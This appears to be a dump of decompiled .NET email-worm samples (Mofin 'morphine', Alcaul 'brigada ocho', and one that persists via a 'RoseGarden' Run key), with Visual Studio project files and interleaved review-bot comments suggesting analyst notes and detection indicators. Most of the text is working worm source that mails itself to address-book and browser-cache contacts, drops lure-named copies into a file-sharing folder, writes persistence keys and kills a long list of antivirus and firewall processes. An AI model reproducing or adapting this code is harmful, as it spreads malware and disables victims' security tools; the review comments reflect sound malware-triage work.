object o2 = RuntimeHelpers.GetObjectValue(LateBinding.LateGet(o1, (Type) null, "GetNameSpace", new object[1]
{
(object) "MAPI"
}, (string[]) null, (bool[]) null));
label_4:
num2 = 4;
object objectValue2;
object LoopForResult1;
if (!FlowControl.ForLoopInitObj(objectValue2, (object) 1, LateBinding.LateGet(LateBinding.LateGet(o2, (Type) null, "AddressLists", new object[0], (string[]) null, (bool[]) null), (Type) null, "Count", new object[0], (string[]) null, (bool[]) null), (object) 1, ref LoopForResult1, ref objectValue2))
goto label_24;
label_5:
num2 = 5;
object o3 = o2;
object[] objArray1 = new object[1]
{
RuntimeHelpers.GetObjectValue(objectValue2)
};
object[] args1 = objArray1;
bool[] flagArray1 = new bool[1]{ true };
bool[] CopyBack1 = flagArray1;
object obj1 = LateBinding.LateGet(o3, (Type) null, "AddressLists", args1, (string[]) null, CopyBack1);
if (flagArray1[0])
objectValue2 = RuntimeHelpers.GetObjectValue(objArray1[0]);
object objectValue3 = RuntimeHelpers.GetObjectValue(obj1);
label_8:
num2 = 6;
object obj2;
if (ObjectType.ObjTst(Conversion.Int(RuntimeHelpers.GetObjectValue(LateBinding.LateGet(LateBinding.LateGet(objectValue3, (Type) null, "AddressEntries", new object[0], (string[]) null, (bool[]) null), (Type) null, "Count", new object[0], (string[]) null, (bool[]) null))), Conversion.Int(RuntimeHelpers.GetObjectValue(obj2)), false) <= 0)
goto label_23;
label_9:
num2 = 7;
object objectValue4;
object LoopForResult2;
if (!FlowControl.ForLoopInitObj(objectValue4, (object) 1, LateBinding.LateGet(LateBinding.LateGet(objectValue3, (Type) null, "AddressEntries", new object[0], (string[]) null, (bool[]) null), (Type) null, "Count", new object[0], (string[]) null, (bool[]) null), (object) 1, ref LoopForResult2, ref objectValue4))
goto label_21;
label_10:
num2 = 8;
object o4 = objectValue3;
object[] objArray2 = new object[1]
{
RuntimeHelpers.GetObjectValue(objectValue4)
};
object[] args2 = objArray2;
bool[] flagArray2 = new bool[1]{ true };
bool[] CopyBack2 = flagArray2;
object obj3 = LateBinding.LateGet(o4, (Type) null, "AddressEntries", args2, (string[]) null, CopyBack2);
if (flagArray2[0])
objectValue4 = RuntimeHelpers.GetObjectValue(objArray2[0]);
object objectValue5 = RuntimeHelpers.GetObjectValue(obj3);
label_13:
num2 = 9;
object objectValue6 = RuntimeHelpers.GetObjectValue(LateBinding.LateGet(o1, (Type) null, "CreateItem", new object[1]
{
(object) 0
}, (string[]) null, (bool[]) null));
label_14:
num2 = 10;
object o5 = LateBinding.LateGet(objectValue6, (Type) null, "Recipients", new object[0], (string[]) null, (bool[]) null);
object[] objArray3 = new object[1]
{
RuntimeHelpers.GetObjectValue(objectValue5)
};
object[] args3 = objArray3;
bool[] flagArray3 = new bool[1]{ true };
bool[] CopyBack3 = flagArray3;
LateBinding.LateCall(o5, (Type) null, "Add", args3, (string[]) null, CopyBack3);
if (flagArray3[0])
objectValue5 = RuntimeHelpers.GetObjectValue(objArray3[0]);
label_16:
num2 = 11;
LateBinding.LateSet(objectValue6, (Type) null, "Subject", new object[1]
{
(object) "知道吗?"
}, (string[]) null);
label_17:
num2 = 12;
LateBinding.LateSet(objectValue6, (Type) null, "Body", new object[1]
{
(object) "\r\nHi! \r\n你知道我很想你吗?看看我特意为你准备的礼物吧!\r\n ..."
}, (string[]) null);
label_18:
num2 = 13;
LateBinding.LateCall(LateBinding.LateGet(objectValue6, (Type) null, "Attachments", new object[0], (string[]) null, (bool[]) null), (Type) null, "Add", new object[1]
{
(object) (Environment.CurrentDirectory + "\\" + Process.GetCurrentProcess().ProcessName + ".exe")
}, (string[]) null, (bool[]) null);
label_19:
num2 = 14;
LateBinding.LateCall(objectValue6, (Type) null, "Send", new object[0], (string[]) null, (bool[]) null);
label_20:
num2 = 15;
if (FlowControl.ForNextCheckObj(objectValue4, LoopForResult2, ref objectValue4))
goto label_10;
label_21:
num2 = 16;
o1 = (object) null;
label_22:
num2 = 17;
o2 = (object) null;
label_23:
num2 = 19;
if (FlowControl.ForNextCheckObj(objectValue2, LoopForResult1, ref objectValue2))
goto label_5;
label_24:
num2 = 20;
LateBinding.LateCall(objectValue1, (Type) null, "RegWrite", new object[2]
{
(object) "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\RoseGarden",
(object) (Module1.GetSystemPath() + "\\" + Process.GetCurrentProcess().ProcessName + ".exe /t")
}, (string[]) null, (bool[]) null);
label_25:
num2 = 21;
Module1.MarkInfected();
goto label_34;
label_26:
int num4 = num3 + 1;
num3 = 0;
switch (num4)
{
case 0:
goto label_0;
case 1:
goto label_1;
case 2:
goto label_2;
case 3:
goto label_3;
case 4:
goto label_4;
case 5:
goto label_5;
case 6:
goto label_8;
case 7:
goto label_9;
case 8:
goto label_10;
case 9:
goto label_13;
case 10:
goto label_14;
case 11:
goto label_16;
case 12:
goto label_17;
case 13:
goto label_18;
case 14:
goto label_19;
case 15:
goto label_20;
case 16:
goto label_21;
case 17:
goto label_22;
case 18:
case 19:
goto label_23;
case 20:
goto label_24;
case 21:
goto label_25;
case 22:
goto label_34;
}
}
catch (Exception ex) when (false)
{
ProjectData.SetProjectError(ex);
exception = ex;
if (num3 == 0)
{
num3 = num2;
switch (num1)
{
case 1:
goto label_26;
default:
throw;
}
}
}
throw exception;
label_34:
if (num3 == 0)
return;
ProjectData.ClearProjectError();
}
public static void MarkInfected()
{
object objectValue = RuntimeHelpers.GetObjectValue(LateBinding.LateGet(Module1.fs, (Type) null, "CreateTextFile", new object[1]
{
(object) ("c:\\$windir$.log" + StringType.FromChar(Strings.Chr((int) byte.MaxValue)))
}, (string[]) null, (bool[]) null));
LateBinding.LateCall(objectValue, (Type) null, "write", new object[1]
{
(object) ("Install date:" + StringType.FromDate(DateTime.Now))
}, (string[]) null, (bool[]) null);
LateBinding.LateCall(objectValue, (Type) null, "Close", new object[0], (string[]) null, (bool[]) null);
string lpFileName = "c:\\$windir$.log" + StringType.FromChar(Strings.Chr((int) byte.MaxValue));
Module1.SetFileAttributes(ref lpFileName, 2L);
}
public static object IsInfected() => RuntimeHelpers.GetObjectValue(LateBinding.LateGet(Module1.fs, (Type) null, "FileExists", new object[1]
{
(object) ("C:\\$windir$.log" + StringType.FromChar(Strings.Chr((int) byte.MaxValue)))
}, (string[]) null, (bool[]) null));
public static void CopyMeToSystemFolder()
{
label_0:
int num1;
int num2;
int num3;
Exception exception;
try
{
ProjectData.ClearProjectError();
num1 = 1;
label_1:
num2 = 1;
LateBinding.LateCall(Module1.fs, (Type) null, "CopyFile", new object[2]
{
(object) (Environment.CurrentDirectory + "\\" + Process.GetCurrentProcess().ProcessName + ".exe"),
(object) (Module1.GetSystemPath() + "\\")
}, (string[]) null, (bool[]) null);
goto label_10;
label_2:
int num4 = num3 + 1;
num3 = 0;
switch (num4)
{
case 0:
goto label_0;
case 1:
goto label_1;
case 2:
goto label_10;
}
}
catch (Exception ex) when (false)
{
ProjectData.SetProjectError(ex);
exception = ex;
if (num3 == 0)
{
num3 = num2;
switch (num1)
{
case 1:
goto label_2;
default:
throw;
}
}
}
throw exception;
label_10:
if (num3 == 0)
return;
ProjectData.ClearProjectError();
}
public static void Timer1_Elapsed(object sender, ElapsedEventArgs e) => Module1.DoAction();
}
}
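Review bot: The decompiled `Module1` has no analyst comment recording the host artefacts it leaves, which is what a reader triaging this sample needs first. From the visible code, `InfectByEmail` writes the Run value `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RoseGarden`, pointing at the copy in the system directory launched with `/t`. `MarkInfected` creates `c:\$windir$.log` followed by character 255 and sets attribute 2 (`FILE_ATTRIBUTE_HIDDEN`) on it. I would add a header comment above the class such as `// Analyst note: persistence = HKLM Run value "RoseGarden" (<system dir>\<process name>.exe /t); infection marker = hidden file c:\$windir$.log + Chr(255)`. The `catch (Exception ex) when (false)` blocks and numbered labels in `InfectByEmail` and `CopyMeToSystemFolder` look like the decompiler's rendering of VB error-resume handling, so a second comment should say the printed control flow is approximate rather than literal.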
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
@@ -0,0 +1,39 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Mofin.a-ccfa30bdcb8041c6e1b24544d159b59bd5119ffa92cdd82b36847cf1b379025c.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{BEA0F945-4328-46F1-96B0-91D907C60288}</ProjectGuid>
<OutputType>Exe</OutputType>
<AssemblyName>morphine</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System.Web" />
</ItemGroup>
<ItemGroup>
<Compile Include="morphine.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "morphine", "Email-Worm.MSIL.Mofin.a-ccfa30bdcb8041c6e1b24544d159b59bd5119ffa92cdd82b36847cf1b379025c.csproj", "{BEA0F945-4328-46F1-96B0-91D907C60288}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{BEA0F945-4328-46F1-96B0-91D907C60288}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{BEA0F945-4328-46F1-96B0-91D907C60288}.Debug|Any CPU.Build.0 = Debug|Any CPU
{BEA0F945-4328-46F1-96B0-91D907C60288}.Release|Any CPU.ActiveCfg = Release|Any CPU
{BEA0F945-4328-46F1-96B0-91D907C60288}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
@@ -0,0 +1,56 @@
// Decompiled with JetBrains decompiler
// Type: morphine
// Assembly: morphine, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F0E102F2-BABF-44AE-B535-A66C5781349C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Mofin.a-ccfa30bdcb8041c6e1b24544d159b59bd5119ffa92cdd82b36847cf1b379025c.exe
using Microsoft.Win32;
using System;
using System.IO;
using System.Text;
using System.Web.Mail;
internal class morphine
{
public static void main()
{
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\WAB\\WAB4\\Wab File Name");
if (registryKey == null)
return;
string path = (string) registryKey.GetValue("");
if (path == null)
return;
registryKey.Close();
FileStream fileStream = new FileStream(path, FileMode.Open, FileAccess.Read);
// ISSUE: explicit non-virtual call
int int32_1 = Convert.ToInt32(__nonvirtual (fileStream.Length));
byte[] numArray = new byte[int32_1];
// ISSUE: explicit non-virtual call
__nonvirtual (fileStream.Read(numArray, 0, int32_1));
// ISSUE: explicit non-virtual call
__nonvirtual (fileStream.Close());
int int32_2 = BitConverter.ToInt32(numArray, 100);
if (int32_2 == 0)
return;
int int32_3 = BitConverter.ToInt32(numArray, 96);
do
{
// ISSUE: explicit non-virtual call
string str1 = __nonvirtual (Encoding.Unicode.GetString(numArray, int32_3, 68));
int startIndex = str1.IndexOf(char.MinValue);
string str2 = str1.Remove(startIndex, 34 - startIndex);
MailMessage message = new MailMessage();
message.Subject = "hi";
message.To = str2;
message.Body = "hi";
message.BodyFormat = MailFormat.Text;
message.Priority = MailPriority.High;
MailAttachment mailAttachment = new MailAttachment(Directory.GetCurrentDirectory() + "\\morphine.exe", MailEncoding.Base64);
message.Attachments.Add((object) mailAttachment);
SmtpMail.Send(message);
int32_3 += 68;
--int32_2;
}
while (int32_2 > 0);
}
}
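Review bot: This decompiled file carries only the decompiler banner and no analyst note, so a reader has to reconstruct what `main` touches; a header such as `// Analysis: reads the default value of HKCU\Software\Microsoft\WAB\WAB4\Wab File Name, parses that file in 68-byte records, and mails morphine.exe to each record via SmtpMail.Send` would make the sample triageable. The two integers read at offsets 100 and 96 look like a record count and a table offset, but the page does not confirm the file format, so the comment should hedge that. The `__nonvirtual (...)` wrappers flagged with `// ISSUE:` are decompiler pseudo-syntax, so the listing should be labelled as a reading aid rather than buildable source. For detection, the behaviours visible here are a read of that registry key by a non-mail process and a run of identical messages whose subject and body are both `hi`.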
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
@@ -0,0 +1,41 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Alcaul.af-f023c356e68bba6651e4525fa000df7e890871cf4ef714e11171e439c3090105.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{BF3E59E5-2F5A-4D61-876C-9CA2230D5ADD}</ProjectGuid>
<OutputType>Exe</OutputType>
<AssemblyName>2peace</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="_003CPrivateImplementationDetails_003E.cs" />
<Compile Include="alcopaul\brigadaochodotnet.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "2peace", "Email-Worm.Win32.Alcaul.af-f023c356e68bba6651e4525fa000df7e890871cf4ef714e11171e439c3090105.csproj", "{BF3E59E5-2F5A-4D61-876C-9CA2230D5ADD}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{BF3E59E5-2F5A-4D61-876C-9CA2230D5ADD}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{BF3E59E5-2F5A-4D61-876C-9CA2230D5ADD}.Debug|Any CPU.Build.0 = Debug|Any CPU
{BF3E59E5-2F5A-4D61-876C-9CA2230D5ADD}.Release|Any CPU.ActiveCfg = Release|Any CPU
{BF3E59E5-2F5A-4D61-876C-9CA2230D5ADD}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
@@ -0,0 +1,17 @@
// Decompiled with JetBrains decompiler
// Type: <PrivateImplementationDetails>
// Assembly: 2peace, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 78079FF0-2005-4E93-BF26-3EA1164CB45F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Alcaul.af-f023c356e68bba6651e4525fa000df7e890871cf4ef714e11171e439c3090105.exe
using System.Runtime.InteropServices;
internal class \u003CPrivateImplementationDetails\u003E
{
internal static \u003CPrivateImplementationDetails\u003E.\u0024\u0024struct0x6000003\u002D1 \u0024\u0024method0x6000003\u002D1;
[StructLayout(LayoutKind.Explicit, Size = 12, Pack = 1)]
private struct \u0024\u0024struct0x6000003\u002D1
{
}
}
@@ -0,0 +1,212 @@
// Decompiled with JetBrains decompiler
// Type: alcopaul.brigadaochodotnet
// Assembly: 2peace, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 78079FF0-2005-4E93-BF26-3EA1164CB45F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Alcaul.af-f023c356e68bba6651e4525fa000df7e890871cf4ef714e11171e439c3090105.exe
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.Net.Sockets;
using System.Reflection;
using System.Text;
using System.Windows.Forms;
namespace alcopaul
{
public class brigadaochodotnet
{
public static void Main(string[] args)
{
string str1 = "zonealarm,wfindv32,vb6,webscanx,vsstat,vshwin32,vsecomr,vscan40,vettray,vet95,tds2-nt,tds2-98,tca,tbscan,sweep95,sphinx,smc,serv95,scrscan,scanpm,scan95,scan32,safeweb,rescue,rav7win,rav7,persfw,pcfwallicon,pccwin98,pavw,pavsched,pavcl,padmin,outpost,nvc95,nupgrade,normist,nmain,nisum,navwnt,navw32,navnt,navlu32,navapw32,n32scanw,mpftray,moolive,luall,lookout,lockdown2000,jedi,iomon98,iface,icsuppnt,icsupp95,icmon,icloadnt,icload95,ibmavsp,ibmasn,iamserv,iamapp,frw,fprot,fp-win,findviru,f-stopw,f-prot95,f-prot,f-agnt95,espwatch,esafe,ecengine";
string str2 = "dvp95_0,dvp95,cleaner3,cleaner,claw95cf,claw95,cfinet32,cfinet,cfiaudit,cfiadmin,blackice,blackd,avwupd32,avwin95,avsched32,avpupd,avptc32,avpm,avpdos32,avpcc,avp32,avp,avnt,avkserv,avgctrl,ave32,avconsol,autodown,apvxdwin,anti-trojan,ackwin32,_avpm,_avpcc,_avp32";
string[] strArray1 = str1.Split(',');
string[] strArray2 = str2.Split(',');
foreach (string ave in strArray1)
brigadaochodotnet.killprocs(ave);
foreach (string ave in strArray2)
brigadaochodotnet.killprocs(ave);
Module module = Assembly.GetExecutingAssembly().GetModules()[0];
string tach = brigadaochodotnet.uue(module.FullyQualifiedName);
Registry.CurrentUser.OpenSubKey("Software\\Kazaa\\LocalContent", true).SetValue("Dir0", (object) ("012345:" + Directory.GetCurrentDirectory()));
string[] strArray3 = new string[11]
{
"shakira.exe",
"avril_lavigne.exe",
"Visual_Studio.NET2003_key.exe",
"teach_yourself_c#_in_1_week.exe",
"scan.net.exe",
"hitman2fulldownloader.exe",
"Tekken4_full_downloader.exe",
"teach_yourself_COBOL.NET_in_21_days.exe",
"how_to_get_chicks_on_your_bed.exe",
"brigadaocho.net.exe",
"drunken_pope_pics.exe"
};
foreach (string destFileName in strArray3)
{
try
{
File.Copy(module.FullyQualifiedName, destFileName);
}
catch
{
}
}
RegistryKey registryKey1 = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Internet Account Manager", true);
RegistryKey registryKey2 = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Internet Account Manager\\Accounts\\" + registryKey1.GetValue("Default Mail Account").ToString(), true);
string mserv = registryKey2.GetValue("SMTP Server").ToString();
string fm = registryKey2.GetValue("SMTP Email Address").ToString();
foreach (string directory1 in Directory.GetDirectories(Environment.GetFolderPath(Environment.SpecialFolder.InternetCache)))
{
foreach (string directory2 in Directory.GetDirectories(directory1))
{
foreach (string file in Directory.GetFiles(directory2, "*.ht*"))
brigadaochodotnet.extractmails(file, mserv, fm, tach);
}
}
int num = (int) MessageBox.Show("brigada ocho ::: \"bringing the c# technology to the masses\"", "msil.mass by PerrunBoy ::: http://vx.netlux.org/~b8", MessageBoxButtons.OK, MessageBoxIcon.Exclamation);
}
public static void extractmails(string phile, string mserv, string fm, string tach)
{
StreamReader streamReader = new StreamReader((Stream) new FileStream(phile, FileMode.OpenOrCreate, FileAccess.Read));
streamReader.BaseStream.Seek(0L, SeekOrigin.Begin);
while (streamReader.Peek() > -1)
{
string to = brigadaochodotnet.xtrak(streamReader.ReadLine());
if (to != "")
brigadaochodotnet.castaway(mserv, fm, to, tach);
}
streamReader.Close();
}
public static string xtrak(string datum)
{
char[] anyOf = new char[6]
{
'?',
'\'',
'"',
'>',
'<',
' '
};
string str1 = datum;
try
{
int sourceIndex = str1.IndexOf("mailto:");
int num = str1.LastIndexOfAny(anyOf);
char[] destination1 = new char[(int) checked ((uint) unchecked (num - sourceIndex))];
str1.CopyTo(sourceIndex, destination1, 0, num - sourceIndex);
string str2 = new string(destination1).Replace("mailto:", "").Replace("%20", "").Replace("%40", "@");
try
{
int count = str2.IndexOfAny(anyOf);
char[] destination2 = new char[(int) checked ((uint) count)];
str2.CopyTo(0, destination2, 0, count);
return new string(destination2);
}
catch
{
return str2;
}
}
catch
{
return "";
}
}
public static string uue(string attch)
{
FileStream input = new FileStream(attch, FileMode.OpenOrCreate, FileAccess.Read);
BinaryReader binaryReader = new BinaryReader((Stream) input);
binaryReader.BaseStream.Seek(0L, SeekOrigin.Begin);
byte[] numArray = new byte[(int) checked ((uint) input.Length)];
int length1 = (int) input.Length;
int index1 = 0;
int num;
for (; length1 > 0; length1 -= num)
{
num = binaryReader.Read(numArray, index1, length1);
if (num != 0)
index1 += num;
else
break;
}
binaryReader.Close();
StringBuilder stringBuilder = new StringBuilder();
string base64String = Convert.ToBase64String(numArray);
int length2 = base64String.Length;
char[] destination = new char[(int) checked ((uint) length2)];
base64String.CopyTo(0, destination, 0, length2);
for (int index2 = 1; index2 <= length2; ++index2)
{
if (index2 % 76 == 0)
stringBuilder.Append(string.Format("{0}\r\n", (object) destination[index2 - 1]));
else
stringBuilder.Append(string.Format("{0}", (object) destination[index2 - 1]));
}
return stringBuilder.ToString();
}
public static void killprocs(string ave)
{
foreach (Process process in Process.GetProcessesByName(ave))
process.Kill();
}
public static void castaway(string serv, string from, string to, string attch)
{
string str1 = "From: " + from + " <" + from + ">\r\n";
string str2 = "To: " + to + " <" + to + ">\r\n";
string str3 = "Date: " + DateTime.Now.ToString() + "\r\n";
string str4 = "X-Mailer: dotNETSMTPengine\r\n";
string str5 = "X-Priority: 3\r\n";
string str6 = "MIME-Version: 1.0\r\n";
string str7 = "Content-Type: multipart/mixed; boundary=\"----=rerty\";\r\n\r\n";
string str8 = "This is a multi-part message in MIME format.\r\n\r\n";
string str9 = "------=rerty\r\n";
string str10 = "Content-Type: text/html; charset=us-ascii\r\n\r\n";
string str11 = "\"all we are saying, is give peace a chance. no to war and terrorism.\"\r\n\r\n";
string str12 = "------=rerty\r\n";
string str13 = "Content-Type: application/x-msdownload; name=\"topeace.exe\"\r\n";
string str14 = "Content-Transfer-Encoding: base64\r\n";
string str15 = "Content-Disposition: attachment; ";
string str16 = "filename=\"topeace.exe\"\r\n\r\n";
string str17 = "\r\n\r\n";
string str18 = "------=rerty--\r\n\r\n.\r\n";
TcpClient tcpClient = new TcpClient(serv, 25);
NetworkStream stream = tcpClient.GetStream();
StreamReader streamReader = new StreamReader((Stream) tcpClient.GetStream());
string str19 = streamReader.ReadLine();
byte[] bytes1 = Encoding.ASCII.GetBytes("HELO localhost\r\n");
stream.Write(bytes1, 0, bytes1.Length);
str19 = streamReader.ReadLine();
byte[] bytes2 = Encoding.ASCII.GetBytes("MAIL FROM: <" + from + ">\r\n");
stream.Write(bytes2, 0, bytes2.Length);
str19 = streamReader.ReadLine();
byte[] bytes3 = Encoding.ASCII.GetBytes("RCPT TO: <" + to + ">\r\n");
stream.Write(bytes3, 0, bytes3.Length);
str19 = streamReader.ReadLine();
byte[] bytes4 = Encoding.ASCII.GetBytes("DATA\r\n");
stream.Write(bytes4, 0, bytes4.Length);
str19 = streamReader.ReadLine();
byte[] bytes5 = Encoding.ASCII.GetBytes(str1 + str2 + str3 + str4 + str5);
stream.Write(bytes5, 0, bytes5.Length);
byte[] bytes6 = Encoding.ASCII.GetBytes(str6 + str7 + str8 + str9 + str10 + str11);
stream.Write(bytes6, 0, bytes6.Length);
byte[] bytes7 = Encoding.ASCII.GetBytes(str12 + str13 + str14 + str15 + str16 + attch + str17 + str18);
stream.Write(bytes7, 0, bytes7.Length);
str19 = streamReader.ReadLine();
byte[] bytes8 = Encoding.ASCII.GetBytes("QUIT\r\n");
stream.Write(bytes8, 0, bytes8.Length);
str19 = streamReader.ReadLine();
stream.Close();
streamReader.Close();
tcpClient.Close();
}
}
}
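Review bot: Nothing in this section records the indicators an analyst would pull from it, and they are scattered across `Main` and `castaway`; a header comment listing them would save re-reading the whole file. From the visible code these are the `X-Mailer: dotNETSMTPengine` header, the attachment name `topeace.exe`, the MIME boundary `----=rerty`, the write to `Dir0` under `HKCU\Software\Kazaa\LocalContent`, and the termination of processes named in the two comma-separated lists at the top of `Main`. `castaway` stores every server reply in `str19` and never inspects it, so the SMTP dialogue continues even after a rejection, which presumably shows up in server logs as commands following an error reply. I would add `// Indicators: X-Mailer dotNETSMTPengine; attachment topeace.exe; boundary ----=rerty` above the class and a one-line summary on each method.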
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
@@ -0,0 +1,41 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Alcaul.ah-98dd24e5e033f2e78507476db2f52ed25e62a1f201b7f499b5ab1b19cb625b73.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{38EB0F0C-CB0D-400E-A3D8-87A1EBB66416}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>b</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="_003CPrivateImplementationDetails_003E.cs" />
<Compile Include="drunkenpope\brigada8.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "b", "Email-Worm.Win32.Alcaul.ah-98dd24e5e033f2e78507476db2f52ed25e62a1f201b7f499b5ab1b19cb625b73.csproj", "{38EB0F0C-CB0D-400E-A3D8-87A1EBB66416}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{38EB0F0C-CB0D-400E-A3D8-87A1EBB66416}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{38EB0F0C-CB0D-400E-A3D8-87A1EBB66416}.Debug|Any CPU.Build.0 = Debug|Any CPU
{38EB0F0C-CB0D-400E-A3D8-87A1EBB66416}.Release|Any CPU.ActiveCfg = Release|Any CPU
{38EB0F0C-CB0D-400E-A3D8-87A1EBB66416}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
@@ -0,0 +1,17 @@
